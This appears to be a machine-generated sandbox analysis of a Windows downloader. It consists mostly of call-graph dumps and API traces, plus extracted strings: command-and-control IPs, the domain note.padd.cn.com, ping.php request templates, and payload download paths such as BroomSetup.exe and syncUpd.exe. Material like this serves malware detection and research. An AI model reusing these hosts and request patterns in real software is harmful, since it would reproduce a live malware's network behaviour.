409275 39217->39218 39220 409277 std::_Facet_Register 39217->39220 39225 412ede 7 API calls 2 library calls 39217->39225 39218->39206 39226 40abcb RaiseException 39220->39226 39222 40996c 39223->39213 39224->39215 39225->39217 39226->39222 39228 403e16 __EH_prolog 39227->39228 39259 407d73 39228->39259 39230 403e38 39269 404189 39230->39269 39236 403e7f 39307 4044e5 39236->39307 39238 403e8b 39328 4043fe 39238->39328 39242 4040a1 __EH_prolog 39241->39242 39243 4040b2 39242->39243 39381 40429b 27 API calls __EH_prolog 39242->39381 39243->39042 39243->39045 39243->39046 39245 4040d9 39382 404777 27 API calls 39245->39382 39247 4040e9 39250 404144 39247->39250 39253 404152 39247->39253 39383 404777 27 API calls 39247->39383 39384 404579 26 API calls 39247->39384 39385 404777 27 API calls 39250->39385 39386 404238 26 API calls _Deallocate 39253->39386 39255 402c03 39254->39255 39256 402bfa 39254->39256 39255->39051 39387 40387f 26 API calls _Deallocate 39256->39387 39258->39043 39260 407d7f __EH_prolog3 39259->39260 39332 407b1c 39260->39332 39263 407da5 _Yarn 39338 407b74 39263->39338 39266 407d9d 39346 407f02 40 API calls _Atexit 39266->39346 39267 407dfb std::locale::_Locimp::_Locimp_dtor 39267->39230 39270 404193 __EH_prolog 39269->39270 39271 407b1c std::_Lockit::_Lockit 2 API calls 39270->39271 39272 4041a2 39271->39272 39351 401318 39272->39351 39274 4041b9 std::locale::_Getfacet 39275 4041cc 39274->39275 39357 40436e 55 API calls 3 library calls 39274->39357 39276 407b74 std::_Lockit::~_Lockit 2 API calls 39275->39276 39278 403e49 39276->39278 39285 4033ea 39278->39285 39279 4041dc 39280 4041e3 39279->39280 39282 404219 39279->39282 39358 407d41 8 API calls std::_Facet_Register 39280->39358 39359 40abcb RaiseException 39282->39359 39284 40422f 39286 4033f4 __EH_prolog 39285->39286 39287 407b1c std::_Lockit::_Lockit 2 API calls 39286->39287 39288 403403 39287->39288 39289 401318 int 4 API calls 39288->39289 39291 40341a std::locale::_Getfacet 39289->39291 39290 40342d 39292 407b74 std::_Lockit::~_Lockit 2 API calls 39290->39292 39291->39290 39360 401429 55 API calls 2 library calls 39291->39360 39294 40346a 39292->39294 39301 404424 39294->39301 39295 40343d 39296 403444 39295->39296 39297 40347a 39295->39297 39361 407d41 8 API calls std::_Facet_Register 39296->39361 39362 40abcb RaiseException 39297->39362 39300 403490 39302 40442e __EH_prolog 39301->39302 39363 404d6b 39302->39363 39304 404463 39305 409256 std::_Facet_Register 8 API calls 39304->39305 39306 40447e 39305->39306 39306->39236 39308 4044ef __EH_prolog 39307->39308 39375 405177 8 API calls std::_Facet_Register 39308->39375 39310 40450d 39376 405025 29 API calls std::_Facet_Register 39310->39376 39312 404517 39313 404571 39312->39313 39314 40451e 39312->39314 39379 404efe 27 API calls 39313->39379 39377 405119 8 API calls std::_Facet_Register 39314->39377 39317 404528 39378 405e85 8 API calls std::_Facet_Register 39317->39378 39319 404531 39319->39238 39329 403eb8 39328->39329 39330 404406 39328->39330 39329->39037 39380 40387f 26 API calls _Deallocate 39330->39380 39333 407b32 39332->39333 39334 407b2b 39332->39334 39336 407b30 39333->39336 39348 408745 EnterCriticalSection 39333->39348 39347 411a5a EnterCriticalSection std::_Lockit::_Lockit 39334->39347 39336->39263 39345 407edf 8 API calls 2 library calls 39336->39345 39339 411a63 39338->39339 39340 407b7e 39338->39340 39350 411a43 LeaveCriticalSection 39339->39350 39341 407b91 39340->39341 39349 408753 LeaveCriticalSection 39340->39349 39341->39267 39344 411a6a 39344->39267 39345->39266 39346->39263 39347->39336 39348->39336 39349->39341 39350->39344 39352 401324 39351->39352 39353 401348 39351->39353 39354 407b1c std::_Lockit::_Lockit 2 API calls 39352->39354 39353->39274 39355 40132e 39354->39355 39356 407b74 std::_Lockit::~_Lockit 2 API calls 39355->39356 39356->39353 39357->39279 39358->39275 39359->39284 39360->39295 39361->39290 39362->39300 39366 404eb6 39363->39366 39365 404d85 39365->39304 39365->39365 39367 404ed2 39366->39367 39368 404ece 39366->39368 39369 404ef8 39367->39369 39370 404eda 39367->39370 39368->39365 39374 4030f6 27 API calls 39369->39374 39372 403859 27 API calls 39370->39372 39372->39368 39375->39310 39376->39312 39377->39317 39378->39319 39380->39329 39381->39245 39382->39247 39383->39247 39384->39247 39385->39253 39387->39255 39389 401bbc __EH_prolog 39388->39389 39429 40307c 39389->39429 39395 401c1f 39396 401c51 39395->39396 39447 40187f 42 API calls 2 library calls 39395->39447 39398 402403 39396->39398 39399 40240d __EH_prolog 39398->39399 39465 402b06 39399->39465 39402 402441 39402->39060 39402->39061 39511 402baa 39404->39511 39406 401a30 ___scrt_fastfail 39406->39064 39408 4024ab __EH_prolog 39407->39408 39409 4024e4 39408->39409 39520 40187f 42 API calls 2 library calls 39408->39520 39411 402b06 42 API calls 39409->39411 39412 4024ee 39411->39412 39413 402551 39412->39413 39416 401d87 65 API calls 39412->39416 39417 40257c 39413->39417 39414 402511 39414->39413 39521 40187f 42 API calls 2 library calls 39414->39521 39416->39414 39418 402586 __EH_prolog 39417->39418 39419 402b06 42 API calls 39418->39419 39422 4025a8 39419->39422 39420 4025d8 39421 40265a 39420->39421 39526 40187f 42 API calls 2 library calls 39420->39526 39428 402b87 26 API calls _Deallocate 39421->39428 39422->39420 39522 401f2b 39422->39522 39564 4023b6 39425->39564 39427 401b95 39427->39068 39428->39071 39430 403086 __EH_prolog 39429->39430 39448 403175 39430->39448 39433 402fe5 39434 402fef __EH_prolog 39433->39434 39435 409256 std::_Facet_Register 8 API calls 39434->39435 39436 403005 39435->39436 39437 407d73 std::locale::_Init 43 API calls 39436->39437 39438 403013 39437->39438 39459 402e7b 39438->39459 39441 402f6b 39443 402f75 __EH_prolog 39441->39443 39442 402fbf std::ios_base::_Ios_base_dtor 39442->39395 39443->39442 39444 402e7b 26 API calls 39443->39444 39445 402f9d 39444->39445 39464 4035f5 55 API calls 7 library calls 39445->39464 39447->39396 39449 40317f __EH_prolog 39448->39449 39450 409256 std::_Facet_Register 8 API calls 39449->39450 39451 4031b9 39450->39451 39452 407d73 std::locale::_Init 43 API calls 39451->39452 39453 4031c6 39452->39453 39454 4033ea 55 API calls 39453->39454 39455 4031f5 std::ios_base::_Ios_base_dtor 39454->39455 39456 401bec 39455->39456 39458 40187f 42 API calls 2 library calls 39455->39458 39456->39433 39458->39456 39460 401c0f 39459->39460 39461 402ed9 39459->39461 39460->39441 39463 40e7d7 26 API calls 2 library calls 39461->39463 39463->39460 39464->39442 39466 402b10 __EH_prolog 39465->39466 39477 403101 39466->39477 39469 401d87 39470 401d99 39469->39470 39476 401df4 39470->39476 39485 402dfd 39470->39485 39473 401de1 39473->39476 39494 40fd67 39473->39494 39476->39402 39479 40310b __EH_prolog 39477->39479 39478 403128 39480 40241d 39478->39480 39484 40187f 42 API calls 2 library calls 39478->39484 39479->39478 39483 403242 42 API calls __EH_prolog 39479->39483 39480->39402 39480->39469 39483->39478 39484->39480 39486 402e0d 39485->39486 39490 401dc4 39485->39490 39486->39490 39505 4022ae 65 API calls 39486->39505 39488 402e1a 39488->39490 39506 40ea7d 65 API calls 2 library calls 39488->39506 39490->39473 39490->39476 39491 4106d4 39490->39491 39492 41049b _Xfiopen 64 API calls 39491->39492 39493 4106ea 39492->39493 39493->39473 39495 40fd72 39494->39495 39496 40fd87 39494->39496 39507 412381 20 API calls __dosmaperr 39495->39507 39500 40fd9f 39496->39500 39509 412381 20 API calls __dosmaperr 39496->39509 39498 40fd77 39508 410905 26 API calls _Deallocate 39498->39508 39500->39476 39502 40fd94 39510 410905 26 API calls _Deallocate 39502->39510 39504 40fd82 39504->39476 39505->39488 39506->39490 39507->39498 39508->39504 39509->39502 39510->39500 39512 402bc6 39511->39512 39513 402bc2 39511->39513 39514 402be9 39512->39514 39515 402bce 39512->39515 39513->39406 39519 4030f6 27 API calls 39514->39519 39517 403859 27 API calls 39515->39517 39517->39513 39520->39409 39521->39413 39523 401f3f 39522->39523 39524 401f52 _Yarn 39522->39524 39523->39420 39524->39523 39527 4102e9 39524->39527 39526->39421 39530 410306 39527->39530 39529 410301 39529->39523 39531 410312 __FrameHandler3::FrameUnwindToState 39530->39531 39532 410352 39531->39532 39533 410325 ___scrt_fastfail 39531->39533 39535 41034a __wsopen_s 39531->39535 39543 40e81d EnterCriticalSection 39532->39543 39557 412381 20 API calls __dosmaperr 39533->39557 39535->39529 39536 41035c 39544 41011d 39536->39544 39539 41033f 39558 410905 26 API calls _Deallocate 39539->39558 39543->39536 39546 41012f ___scrt_fastfail 39544->39546 39550 41014c 39544->39550 39545 41013c 39560 412381 20 API calls __dosmaperr 39545->39560 39546->39545 39546->39550 39553 41018f __fread_nolock 39546->39553 39548 410141 39561 410905 26 API calls _Deallocate 39548->39561 39559 410391 LeaveCriticalSection std::_Xfsopen 39550->39559 39551 4102ab ___scrt_fastfail 39563 412381 20 API calls __dosmaperr 39551->39563 39553->39550 39553->39551 39554 4154e8 _Xfiopen 26 API calls 39553->39554 39556 4192ad __fread_nolock 38 API calls 39553->39556 39562 410399 26 API calls 4 library calls 39553->39562 39554->39553 39556->39553 39557->39539 39558->39535 39559->39535 39560->39548 39561->39550 39562->39553 39563->39548 39565 4023dd 39564->39565 39566 4023ef 39565->39566 39568 402f2f 39565->39568 39566->39427 39569 402f3d 39568->39569 39575 402f39 39568->39575 39570 402dfd 65 API calls 39569->39570 39571 402f42 39570->39571 39573 40e228 _Xfiopen 67 API calls 39571->39573 39572 402e7b 26 API calls 39574 402f66 39572->39574 39573->39575 39574->39566 39575->39572 39577 40106d ___scrt_initialize_default_local_stdio_options 39576->39577 39584 40fd43 39577->39584 39581 4039c7 39580->39581 39582 4039bb 39580->39582 39581->39080 39583 402c71 27 API calls 39582->39583 39583->39581 39587 40ead5 39584->39587 39588 40eb15 39587->39588 39589 40eafd 39587->39589 39588->39589 39591 40eb1d 39588->39591 39611 412381 20 API calls __dosmaperr 39589->39611 39613 40e3f2 38 API calls 2 library calls 39591->39613 39592 40eb02 39612 410905 26 API calls _Deallocate 39592->39612 39595 40eb2d 39614 40eef9 20 API calls __dosmaperr 39595->39614 39598 40eba5 39615 40f0ad 50 API calls 2 library calls 39598->39615 39599 40107b 39599->39076 39602 40eb0d 39604 4097a5 39602->39604 39603 40ebb0 39616 40ef2e 20 API calls _free 39603->39616 39605 4097b0 IsProcessorFeaturePresent 39604->39605 39606 4097ae 39604->39606 39608 409efa 39605->39608 39606->39599 39617 409ebe SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 39608->39617 39610 409fdd 39610->39599 39611->39592 39612->39602 39613->39595 39614->39598 39615->39603 39616->39602 39617->39610 39619 401aab 39618->39619 39619->39619 39627 402cba 39619->39627 39621 401abd 39621->39086 39622->39136 39623->39138 39624->39125 39625->39142 39626->39142 39628 402cd0 BuildCatchObjectHelperInternal 39627->39628 39629 402cfa 39627->39629 39628->39621 39631 4037a9 27 API calls 2 library calls 39629->39631 39631->39628 39632->39146 39634 410c87 39633->39634 39635 410c9c 39633->39635 39641 412381 20 API calls __dosmaperr 39634->39641 39643 410965 51 API calls 4 library calls 39635->39643 39638 410c8c 39642 410905 26 API calls _Deallocate 39638->39642 39640 410c97 39640->39168 39641->39638 39642->39640 39643->39640 39644->39181 39646 4138da _abort 39645->39646 39647 4138e1 39646->39647 39648 4138f3 39646->39648 39681 413a28 GetModuleHandleW 39647->39681 39669 4119fb EnterCriticalSection 39648->39669 39651 4138e6 39651->39648 39682 413a6c GetModuleHandleExW 39651->39682 39656 4138fa 39666 413998 39656->39666 39668 41396f 39656->39668 39690 4151ba 20 API calls _abort 39656->39690 39657 4139e1 39693 424569 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 39657->39693 39658 4139b5 39673 4139e7 39658->39673 39665 413987 39692 41381a 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 39665->39692 39670 4139d8 39666->39670 39668->39665 39691 41381a 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 39668->39691 39669->39656 39694 411a43 LeaveCriticalSection 39670->39694 39672 4139b1 39672->39657 39672->39658 39695 4177fa 39673->39695 39676 413a15 39679 413a6c _abort 8 API calls 39676->39679 39677 4139f5 GetPEB 39677->39676 39678 413a05 GetCurrentProcess TerminateProcess 39677->39678 39678->39676 39680 413a1d ExitProcess 39679->39680 39681->39651 39683 413a96 GetProcAddress 39682->39683 39684 413ab9 39682->39684 39688 413aab 39683->39688 39685 413ac8 39684->39685 39686 413abf FreeLibrary 39684->39686 39687 4097a5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 39685->39687 39686->39685 39689 4138f2 39687->39689 39688->39684 39689->39648 39690->39668 39691->39665 39692->39666 39694->39672 39696 417815 39695->39696 39697 41781f 39695->39697 39699 4097a5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 39696->39699 39702 4171b7 5 API calls 2 library calls 39697->39702 39700 4139f1 39699->39700 39700->39676 39700->39677 39701 417836 39701->39696 39702->39701 39703 40f5436 39704 40f5445 39703->39704 39707 40f5bd6 39704->39707 39709 40f5bf1 39707->39709 39708 40f5bfa CreateToolhelp32Snapshot 39708->39709 39710 40f5c16 Module32First 39708->39710 39709->39708 39709->39710 39711 40f5c25 39710->39711 39713 40f544e 39710->39713 39714 40f5895 39711->39714 39715 40f58c0 39714->39715 39716 40f5909 39715->39716 39717 40f58d1 VirtualAlloc 39715->39717 39716->39716 39717->39716 39718 5b6003c 39719 5b60049 39718->39719 39733 5b60e0f SetErrorMode SetErrorMode 39719->39733 39724 5b60265 39725 5b602ce VirtualProtect 39724->39725 39727 5b6030b 39725->39727 39726 5b60439 VirtualFree 39731 5b605f4 LoadLibraryA 39726->39731 39732 5b604be 39726->39732 39727->39726 39728 5b604e3 LoadLibraryA 39728->39732 39730 5b608c7 39731->39730 39732->39728 39732->39731 39734 5b60223 39733->39734 39735 5b60d90 39734->39735 39736 5b60dad 39735->39736 39737 5b60dbb GetPEB 39736->39737 39738 5b60238 VirtualAlloc 39736->39738 39737->39738 39738->39724 39739 4264f9 SysFreeString SysFreeString CoUninitialize 39740 41870f 39741 41871b __FrameHandler3::FrameUnwindToState 39740->39741 39742 418727 39741->39742 39743 41873e 39741->39743 39774 412381 20 API calls __dosmaperr 39742->39774 39753 40e81d EnterCriticalSection 39743->39753 39746 41874e 39754 41878b 39746->39754 39747 41872c 39775 410905 26 API calls _Deallocate 39747->39775 39750 41875a 39776 418781 LeaveCriticalSection std::_Xfsopen 39750->39776 39752 418737 __wsopen_s 39753->39746 39755 4187b3 39754->39755 39756 418799 39754->39756 39758 4154e8 _Xfiopen 26 API calls 39755->39758 39780 412381 20 API calls __dosmaperr 39756->39780 39760 4187bc 39758->39760 39759 41879e 39781 410905 26 API calls _Deallocate 39759->39781 39777 4197e5 39760->39777 39764 4188c0 39766 4188cd 39764->39766 39770 418873 39764->39770 39765 418844 39768 418861 39765->39768 39765->39770 39783 412381 20 API calls __dosmaperr 39766->39783 39782 418aa4 31 API calls 3 library calls 39768->39782 39773 4187a9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39770->39773 39784 418920 30 API calls 2 library calls 39770->39784 39771 41886b 39771->39773 39773->39750 39774->39747 39775->39752 39776->39752 39785 419662 39777->39785 39779 4187d8 39779->39764 39779->39765 39779->39773 39780->39759 39781->39773 39782->39771 39783->39773 39784->39773 39786 41966e __FrameHandler3::FrameUnwindToState 39785->39786 39787 419676 39786->39787 39788 41968e 39786->39788 39811 41236e 20 API calls __dosmaperr 39787->39811 39790 419742 39788->39790 39795 4196c6 39788->39795 39816 41236e 20 API calls __dosmaperr 39790->39816 39791 41967b 39812 412381 20 API calls __dosmaperr 39791->39812 39794 419747 39817 412381 20 API calls __dosmaperr 39794->39817 39810 41e5cd EnterCriticalSection 39795->39810 39796 419683 __wsopen_s 39796->39779 39799 41974f 39818 410905 26 API calls _Deallocate 39799->39818 39800 4196cc 39802 4196f0 39800->39802 39803 419705 39800->39803 39813 412381 20 API calls __dosmaperr 39802->39813 39805 419767 _Xfiopen 28 API calls 39803->39805 39807 419700 39805->39807 39806 4196f5 39814 41236e 20 API calls __dosmaperr 39806->39814 39815 41973a LeaveCriticalSection __wsopen_s 39807->39815 39810->39800 39811->39791 39812->39796 39813->39806 39814->39807 39815->39796 39816->39794 39817->39799 39818->39796

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 42676c-4272ca call 42780c call 403491 * 15 call 40197c call 403491 * 14 call 40197c call 403491 * 17 call 40197c call 403491 * 7 call 40197c call 403491 * 2 call 40197c call 403491 * 2 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 401b1e call 401a67 call 401aa1 call 403491 * 9 call 40197c call 401aa1 * 2 call 403491 * 6 call 40197c call 401aa1 call 401a67 call 401aa1 * 2 call 403491 * 12 call 40197c call 401aa1 call 403491 * 61 call 40197c call 401aa1 call 403491 * 55 call 40197c call 401aa1 * 2 473 4272d0-4272d3 0->473 474 4273e4-427405 call 401aa1 WSAStartup 0->474 473->474 476 4272d9-4273df call 403491 * 16 call 40197c call 401aa1 call 403ae1 call 401ac2 call 401ae8 call 401aa1 473->476 479 42740b-427421 socket 474->479 480 4277d9 474->480 476->474 482 427423-427433 call 40ff7e WSACleanup 479->482 483 427438-42744b call 401a67 gethostbyname 479->483 485 4277dc-4277e5 call 40ff7e 480->485 495 4277f3-42780b call 401ae8 482->495 483->485 496 427451-42748d call 40ac40 htons connect 483->496 494 4277e6-4277ed WSACleanup closesocket 485->494 494->495 496->485 504 427493-4274af call 403da5 call 401a67 send 496->504 504->485 514 4274b5-4274b9 504->514 516 4274d1-4274f5 call 40b740 514->516 517 4274bb-4274cb send 514->517 524 4274f7-42750b recv 516->524 517->485 517->516 524->485 526 427511-427516 524->526 528 42761e-427627 526->528 529 42751c-427524 526->529 528->485 530 42762d-427630 528->530 529->528 532 42752a-427532 529->532 530->524 532->528 534 427538-427543 532->534 536 427545-42755a call 412faf 534->536 537 427568-427571 534->537 536->485 547 427560-427563 536->547 538 427574-427579 537->538 538->538 541 42757b-42757d 538->541 544 427583-427598 call 403a0c 541->544 545 427635-42763a 541->545 552 427615-42761b 544->552 561 42759a-4275ba call 412faf 544->561 549 427647-42764b 545->549 550 42763c-427640 545->550 547->552 555 427651-42766d call 426152 549->555 556 42777d-42777f 549->556 554 427642 550->554 550->555 552->528 554->485 572 427670-427672 555->572 559 4277c3-4277d0 call 426152 556->559 560 427781-42779a call 426152 556->560 577 4277d2-4277d7 559->577 574 42779d-4277b0 recv 560->574 575 4275de-4275f6 call 412faf 561->575 576 4275bc-4275d6 call 411957 561->576 578 427675-427689 recv 572->578 574->485 580 4277b2-4277bf 574->580 575->552 594 4275f8-427612 call 412faf 575->594 576->485 593 4275dc 576->593 577->494 578->485 583 42768f-427694 578->583 580->574 585 4277c1 580->585 588 427763-42776a 583->588 589 42769a-42769f 583->589 585->577 588->578 590 427770 588->590 589->588 591 4276a5-4276aa 589->591 590->485 591->588 596 4276b0-4276d1 call 411957 591->596 593->552 594->552 596->485 603 4276d7-4276d9 596->603 603->485 605 4276df 603->605 607 427772-42777b 605->607 608 4276e5-4276f1 605->608 607->577 610 4276f3-42770a call 426148 608->610 611 42770d-42770f 608->611 610->611 614 427712-427728 recv 611->614 614->485 617 42772e-42773b 614->617 617->614 618 42773d-42774f recv 617->618 618->485 619 427755-42775e 618->619 619->572
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00426771
                                                                                                                                                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 004273FD
                                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00427413
                                                                                                                                                                                                                              • WSACleanup.WS2_32 ref: 0042742D
                                                                                                                                                                                                                              • gethostbyname.WS2_32(00000000), ref: 00427441
                                                                                                                                                                                                                              • htons.WS2_32(?), ref: 00427473
                                                                                                                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 00427484
                                                                                                                                                                                                                              • send.WS2_32(00000000,00000000,00000000,00000000), ref: 004274A7
                                                                                                                                                                                                                              • send.WS2_32(00000000,00000000,?,00000000), ref: 004274C3
                                                                                                                                                                                                                              • recv.WS2_32(00000000,00000000,00000001,00000000), ref: 00427503
                                                                                                                                                                                                                              • recv.WS2_32(?,00000000,00000001,00000000), ref: 00427681
                                                                                                                                                                                                                              • recv.WS2_32(?,?,00000000,00000000), ref: 00427720
                                                                                                                                                                                                                              • recv.WS2_32(?,0000000A,00000002,00000000), ref: 00427747
                                                                                                                                                                                                                              • recv.WS2_32(00000000,?,?,00000000), ref: 004277A8
                                                                                                                                                                                                                              • WSACleanup.WS2_32 ref: 004277E6
                                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 004277ED
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                              • String ID: HTTP/1.1$(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36$/ping.php?substr=%s$185.172.128.228$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
                                                                                                                                                                                                                              • API String ID: 791229064-1542616328
                                                                                                                                                                                                                              • Opcode ID: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
                                                                                                                                                                                                                              • Instruction ID: 4e55451fc037eb126e07087a8435dc815b4e607a9865e0499e256671a6cdd487
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F39287209062E19ACB02FFB56C5659E7FF4591530D714747FE690AF393CB2C86088B9E
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 620 424a0e-424b14 call 40a0c0 call 403491 call 40197c call 401b1e call 401a8d call 401a72 call 401a8d call 403498 call 401b52 call 401b1e call 4265bc call 401b1e GetModuleFileNameA call 401b1e call 42604a call 401a0c 651 424da5-424da7 620->651 652 424b1a 620->652 653 4252b7-42588c call 403491 * 15 call 40197c call 403491 * 19 call 40197c call 401b1e call 401a67 call 40356f call 401ae8 call 401b41 * 2 call 401adf call 401a67 call 401adf call 42676c call 40ff7e call 403491 * 14 call 40197c call 403491 * 15 call 40197c call 403491 * 12 call 40197c call 403491 * 13 call 40197c call 401b41 * 2 call 401adf * 2 call 42676c 651->653 654 424dad-425299 call 403491 * 35 call 40197c call 401b1e call 401a67 * 2 call 4034e3 call 401ae8 call 403491 * 14 call 40197c call 401b41 * 2 call 401adf call 401a67 call 401adf call 42676c call 40ff7e call 403491 * 21 call 40197c call 403491 * 9 call 40197c call 403491 call 40197c call 42615a 651->654 655 424b21-424b51 call 403491 * 3 652->655 656 424b56-424b86 call 403491 * 3 652->656 657 424d26-424d62 call 403491 * 4 652->657 658 424d64-424d8d call 403491 * 3 652->658 659 424c5a-424c8a call 403491 * 3 652->659 660 424b8b-424bd3 call 403491 * 5 652->660 661 424bd8-424c14 call 403491 * 4 652->661 662 424c19-424c55 call 403491 * 4 652->662 663 424c8f-424cd7 call 403491 * 5 652->663 664 424cdc-424d24 call 403491 * 5 652->664 1166 425892-425910 call 40b740 call 403491 * 4 call 40197c call 426582 call 426242 653->1166 1167 425fc0-42601f call 4019f8 * 2 call 401ae8 call 401a11 call 401ae8 * 4 653->1167 1138 42529e-4252b2 call 4019f8 call 401ae8 654->1138 737 424d94-424da0 call 40197c call 401adf 655->737 656->737 657->737 658->737 659->737 660->737 661->737 662->737 663->737 664->737 737->651 1138->653 1200 425912-425924 call 401b1e call 426510 1166->1200 1201 42592c-425b37 call 40ff7e call 403491 * 16 call 40197c call 403491 * 14 call 40197c call 401b41 * 2 call 401adf * 2 call 42676c 1166->1201 1208 425929 1200->1208 1282 425d0d-425d12 1201->1282 1283 425b3d-425c53 call 40b740 call 403491 * 4 call 40197c call 426582 call 40b740 call 426582 call 403491 * 8 call 40197c call 40b740 1201->1283 1208->1201 1284 425fb4-425fbb call 4019f8 1282->1284 1285 425d18-425f01 call 403491 * 15 call 40197c call 403491 * 15 call 40197c call 401b41 * 2 call 401adf * 2 call 42676c 1282->1285 1363 425c55-425c5a 1283->1363 1284->1167 1420 425f07-425f82 call 40b740 call 403491 * 4 call 40197c call 426582 call 426242 1285->1420 1421 425fab-425faf call 4019f8 1285->1421 1363->1363 1365 425c5c-425c65 1363->1365 1367 425c66-425c6c 1365->1367 1367->1367 1369 425c6e-425c7c 1367->1369 1371 425c7e-425c83 1369->1371 1371->1371 1373 425c85-425c8e 1371->1373 1374 425c8f-425c95 1373->1374 1374->1374 1376 425c97-425cbe call 426242 1374->1376 1383 425d00-425d07 call 40ff7e 1376->1383 1384 425cc0-425ce4 CreateDirectoryA call 42628b 1376->1384 1390 425d0c 1383->1390 1384->1383 1392 425ce6-425cf8 call 401b1e call 426510 1384->1392 1390->1282 1400 425cfd 1392->1400 1400->1383 1439 425f84-425f96 call 401b1e call 426510 1420->1439 1440 425f9e-425fa5 call 40ff7e 1420->1440 1421->1284 1446 425f9b 1439->1446 1443 425faa 1440->1443 1443->1421 1446->1440
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004265BC: __EH_prolog.LIBCMT ref: 004265C1
                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 00424AD4
                                                                                                                                                                                                                                • Part of subcall function 0042604A: __EH_prolog.LIBCMT ref: 0042604F
                                                                                                                                                                                                                                • Part of subcall function 0042604A: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
                                                                                                                                                                                                                              • String ID: .exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com$sub=([\w-]{1,255})$two
                                                                                                                                                                                                                              • API String ID: 2531350358-3033353151
                                                                                                                                                                                                                              • Opcode ID: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
                                                                                                                                                                                                                              • Instruction ID: d125a89a0ba1aec4cd60c53361ca74c042bcd3054cac0714d62587379a507679
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFB2131050A2E19AC712FB7958567CA2FE49B62309F54687FE7D01F2A3CB78460C87DE
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1707 42628b-4262cf call 427830 CoInitialize CoCreateInstance 1710 4262d1-4262d6 1707->1710 1711 4262ef-4262f1 1707->1711 1712 4262d7-4262ee call 40ddc6 1710->1712 1713 4262f4-4262f9 1711->1713 1713->1713 1715 4262fb-426321 MultiByteToWideChar SysAllocStringLen 1713->1715 1717 426324-426329 1715->1717 1717->1717 1718 42632b-42633c MultiByteToWideChar 1717->1718 1719 42633f-426344 1718->1719 1719->1719 1720 426346-426365 MultiByteToWideChar SysAllocStringLen 1719->1720 1721 426368-42636d 1720->1721 1721->1721 1722 42636f-4263a6 MultiByteToWideChar 1721->1722 1724 4263a8-4263b7 1722->1724 1725 4263bc-4263e8 1722->1725 1724->1712 1728 4263f0-4263fd 1725->1728 1729 4263ea-4263ee 1725->1729 1732 42640f-426422 1728->1732 1733 4263ff-42640d 1728->1733 1729->1724 1736 426457-4264d2 1732->1736 1737 426424-426450 call 40ddc6 1732->1737 1733->1729 1749 4264d6-4264f2 call 40ddc6 1736->1749 1737->1736
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 004262AD
